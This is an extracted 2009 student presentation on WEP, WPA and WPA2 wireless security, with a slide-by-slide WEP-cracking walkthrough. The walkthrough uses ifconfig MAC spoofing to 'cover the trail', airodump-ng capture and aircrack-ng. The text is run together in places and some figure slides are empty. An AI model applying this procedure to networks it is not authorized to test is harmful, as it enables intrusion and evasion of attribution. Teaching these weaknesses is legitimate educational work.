SSI Commons Wireless Protocols WEP and WPA2 Bertil Maria Pires Marques E-mail: pro09020@fe.up.pt Dez 2009 Dez 2009 1
WEP -Wired Equivalent Privacy WEPisasecurityprotocol,specifiedintheIEEEWireless Fidelity (Wi-Fi) standard, that is designed to provide a wireless local area network(wlan). Two types of authentication were introduced with the original 802.11 standard: Open and shared key authentication. Wireless networks broadcast messages using radio and are thus more susceptible to eavesdropping than wired networks. Whenintroducedin 1997,WEP wasintendedtoprovide confidentiality comparable to that of a traditional wired network. Dez 2009 2
WEP -Wired Equivalent Privacy The first function of 802.11 standard algorithm is to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. This function is not an explicit goal in the 802.11 standard, but it is frequently considered to be a feature of WEP. WEP relies on a secret key that is shared between a mobile station (eg. a laptop with a wireless ethernet card)andanaccesspoint(ie.abasestation)orbetween 2 mobile station. Dez 2009 3
WEP -Wired Equivalent Privacy The secret key is used to encrypt packets before they are transmitted, and an integrity check is used to ensure that packets are not modified in transit. The standard does not discuss how the shared key is established. WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. Basic WEP encryption RC4 keystream XORed with plaintext Dez 2009 4
WEP -Wired Equivalent Privacy Problems!! WEP uses the RC4 encryption algorithm, which is known as a stream cipher. A stream cipher operates by expanding a short key into an infinite pseudo-random key stream. The sender XORs the key stream with the plaintext to produce ciphertext. The receiver has a copy of the same key, and uses it to generate identical key stream. XORing the key stream with the ciphertext yields the original plaintext. This mode of operation makes stream ciphers vulnerable to several attacks. Dez 2009 5
WEP -Wired Equivalent Privacy Identified Attacks Passive Attack to Decrypt Traffic A passive eavesdropper can intercept all wireless traffic, until an IV collision occurs. Active Attack to Inject Traffic An attacker knows the exact plaintext for one encrypted message. He can use this knowledge to construct correct encrypted packets Active Attack from Both Ends The attacker makes a guess not about the contents, but rather the headers of a packet. Table-based Attack The small space of possible initialization vectors allows an attacker to build a decryption table. Dez 2009 6
WPA -WiFiProtected Access Before WPA were in use, some companies tried to secure their WLANs by filtering MAC addresses and not broadcasting SSIDs. Following the weakness of WEP-based security, there was a period of interim security measures. Vendors such as Cisco, wanting to meet the demand for better security, developed their own systems while simultaneously helping to evolve the 802.11i standard. On the way to 802.11i, the TKIP (Temporal Key Integrity Protocol is a WPA feature used to ensure integrity in wireless data transmission) encryption algorithm was created, which waslinkedtowifiprotectedaccess-wpa-securitymethod. Dez 2009 7
WPA -WiFiProtected Access TKIP is the encryption method certified as WPA. It provides support for legacy WLAN equipment by addressing the original flaws associated with the 802.11 WEP encryption method. Itmakesuseoftheoriginalencryptionalgorithmusedby the original encryption algorithm used WEP. TKIP has two primary functions: ItencryptstheLayer2payload. It carries out a message integrity check (MIC) in the encrypted packet. This helps ensure against a message being tampered with. Dez 2009 8
WPA2 -WiFiProtected Access The standard that should be followed in most enterprise networks is the 802.11i standard. This is similar to the Wi-Fi Alliance WPA2 standard. In networks that have stricter security requirements, an additional authentication or login is required to grant clients such access. This login process is managed by the Extensible Authentication Protocol (EAP). EAP is a framework for authenticating network access. IEEE developed the 802.11i standard for WLAN authentication and authorization to use IEEE 802.1x. Dez 2009 9
WPA2 -WiFiProtected Access Dez 2009 10
WPA2 -WiFiProtected Access Dez 2009 11
WPA2 -WiFiProtected Access Two enterprise-level encryption mechanisms specified by 802.11i are certified as WPA and WPA2 by the Wi-Fi Alliance: Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard(AES). The AES encryption of WPA2 is the preferred method, because it brings the WLAN encryption standards into alignment with broader IT industry standards and best practices, most notably IEEE 802.11i. AEShasthesamefunctionsasTKIP,butitusesadditionaldata from the MAC header that allows destination hosts to recognize if the non-encrypted bits have been tampered with. Italsoaddsasequencenumbertotheencrypteddataheader. Dez 2009 12
Wireless Protocol Overview Dez 2009 13
WEP ProtocolCracking.. Search for desired software. UseaWEPkeywith128bits. Turnoffwirelessinterfacetosoftwaretakecareofit: ifconfig wlan0 down Afterwewillmake: ifconfig wlan0 hw ether 00:00:00:00:23:24 (give a fake address Ethernet to cover the trail ) Dez 2009 14
WEP ProtocolCracking.. Verify the existing networks around: airodump-ng wlan0 Dez 2009 15
WEP ProtocolCracking.. We are only interested on IV pakages [-i ] the only ones with information WEP to crack [-t WEP] in channel 6 [-c6] and write on file named listagem [-w listagem] airodump-ng wlan0 -i -t WEP -c6 -w listagem Dez 2009 16
WEP ProtocolCracking.. Command result. Dez 2009 17
WEP ProtocolCracking.. Command to begin aircrack-ng listagem-01.ivs Dez 2009 18
To End WEP ProtocolCracking.. Dez 2009 19
WEP ProtocolCracking.. Some Conclusions: As result encryption and key have changed. When in listen Mode, several wireless cards were detectedinthearea. [Figurepage17] Listen time 15 hours(stayed overnight). There exist faster methods, but this one is the simplest and the least intrusive. ItiseasyfindwirelessnetworksWEP. Dez 2009 20
Curiosities found.. WhenresearchingontheInternet,Ifoundaboutthistopics: Brazilian books published Redes, Guia Prático Autor: Carlos E. Morimoto Páginas: 560 Formato: 23 x 16 cm Editora:GDH Presse Sul Editores ISBN: 978-85-99593-09-7 Lançado em: Abril de 2008.Ao longo do livro, você. Uso de utilitários de segurança para capturar tráfego da rede, detectar brechas e quebrar os sistemas de encriptação das redes wireless. Dez 2009 21
Curiosities found.. American magazine about haking Dez 2009 22
Wireless Protocols WEP/WPA/WPA2 Thankyou you, Anyquestions? Dez 2009 23